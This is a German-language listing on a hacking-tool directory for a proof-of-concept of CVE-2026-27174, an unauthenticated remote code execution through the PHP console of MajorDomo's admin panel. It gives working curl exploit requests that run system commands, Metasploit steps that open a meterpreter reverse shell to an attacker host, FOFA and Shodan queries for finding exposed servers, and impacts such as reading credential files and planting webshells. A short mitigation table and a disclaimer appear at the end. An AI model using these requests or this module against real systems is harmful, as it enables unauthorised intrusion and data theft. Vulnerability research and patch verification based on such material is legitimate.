Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/maxmnml/majordomo-cve-2026-27174-poc
SchwachstellenscannerExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmaxmnml/majordomo-cve-2026-27174-poc

majordomo-CVE-2026-27174-poc

CVE-2026-27174 - Eine nicht authentifizierte Remote-Codeausführung über die PHP-Konsolenfunktion des Admin-Panels

Repository anzeigen
4vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

majordomo-CVE-2026-27174-poc

Ein Proof-of-Concept, das eine nicht authentifizierte Remote-Codeausführung über die PHP-Konsolenfunktion des Admin-Panels in MajorDomo (Major Domestic Module) ausnutzt.

Schwachstelle

Das Admin-Panel von MajorDoMo stellt über /admin.php eine PHP-Auswertungskonsole bereit. Aufgrund eines fehlenden exit nach einer Authentifizierungsweiterleitung in panel.class.php wird der AJAX-Handler inc_panel_ajax.php bedingungslos eingebunden – wodurch dessen eval() von jeder nicht authentifizierten HTTP-Anfrage erreicht werden kann.

Ein Angreifer kann mit einer einzigen GET-Anfrage beliebigen PHP-Code ausführen – ohne Anmeldedaten, ohne vorherigen Zugriff und ohne Interaktion seitens des Opfers.

Betroffene Versionen

  • Alle MajorDomo-Versionen vor dem Patch vom 18. Februar 2026.

Erkennungs-Scanner

scan.py ist ein nicht-destruktiver, multithreaded Scanner, der Hosts erkennt, die für CVE-2026-27174 anfällig sind, ohne schädliche Payloads auszuführen.

So funktioniert es

Der Scanner arbeitet pro Ziel in drei aufeinanderfolgenden Phasen:

Phase 1 — RCE-Bestätigung
  └─ Sendet: echo 'random_marker';
  └─ Prüft: Marker wird im Antworttext reflektiert
  └─ Bestätigt: eval() ist ohne Authentifizierung erreichbar

Phase 2 — PHP-Sandbox-Profilierung
  └─ Sendet: echo 'marker:' . ini_get('disable_functions');
  └─ Extrahiert: Liste der auf dem Server deaktivierten PHP-Funktionen

Phase 3 — OS-Ausführungsoberfläche
  └─ Prüft: system, exec, shell_exec, passthru via function_exists()
  └─ Klassifiziert: Auswirkungsgrad als HIGH oder MEDIUM

Ein zufälliger alphanumerischer Marker wird pro Anfrage generiert, um Fehlalarme durch Caching, WAFs oder Antwortverschmutzung zu vermeiden.

Verwendung

Anforderungen

pip install requests

1. Eine Zieldatei vorbereiten

Erstelle eine Datei targets.txt mit einem IP:PORT pro Zeile:

192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# Zeilen, die mit # beginnen, werden ignoriert
# nur das Format IP:PORT wird akzeptiert

2. Den Scanner ausführen

python3 scan.py targets.txt

Ausgabe

[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

Wird automatisch erzeugt, wenn mindestens ein anfälliger Host gefunden wird:

[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]
FeldBeschreibung
targetGescannte IP:PORT
urlVollständige URL, unter der RCE bestätigt wurde
rce_phpPHP-Codeausführung bestätigt (in Ergebnissen immer true)
disable_functionsPHP-Einstellung disable_functions des Servers (null, wenn leer)
system_functions_availableOS-Ausführungsfunktionen, die ein Angreifer aufrufen kann
impact_levelHIGH (OS-Ausführung erreichbar) oder MEDIUM (nur PHP-RCE)

Ausnutzung

Basierend auf dem Wert des Feldes system_functions_available in der Datei result.json können wir eine GET-Anfrage mit den Systemfunktionen erstellen, um die RCE auszunutzen:

curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#oder
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Automatisierung

Metasploit-Modul:

msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

In freier Wildbahn

FOFA:

title="MajorDomoSL"

SHODAN:

http.title:"MajorDomoSL"

Auswirkung

Ein remote nicht authentifizierter Angreifer kann:

  • Beliebigen PHP-Code auf dem Server ausführen
  • Sensible Dateien lesen (/etc/passwd, Konfigurationsdateien, Anmeldedaten)
  • PHP-Webshells für dauerhaften Zugriff schreiben
  • Zu OS-Ebene-Befehlausführung übergehen, wenn die PHP-Funktionen system, exec, shell_exec oder passthru nicht deaktiviert sind

Die tatsächliche Auswirkung hängt von der disable_functions-PHP-Konfiguration des Servers ab:

SzenarioAuswirkungsgradBeschreibung
Kein disable_functionsKRITISCHVollständige OS-Befehlausführung
Teilweise EinschränkungenHOCHPHP-RCE + teilweise OS-Ausführung
disable_functions blockiert alle exec-FunktionenMITTELNur PHP-RCE (Datei lesen/schreiben, Datensammlung)

CVSS 4.0 - 9.3 KRITISCH — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 KRITISCH — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Abhilfe & Schadensbegrenzung

Auf die neueste Version von MajorDomo (Major Domestic Module) aktualisieren.

KontrolleVerhindert RCEVerhindert OS-Ausführung
Patch vom 18.02.2026 anwenden✅✅
Firewall/IP-Allowlist für /admin.php✅✅
disable_functions-Härtung❌✅

Referenzen

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

https://github.com/sergejey/majordomo/pull/1177

Haftungsausschluss

Dieses Tool ist nur für autorisierte Sicherheitstests bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal.

Tool herunterladen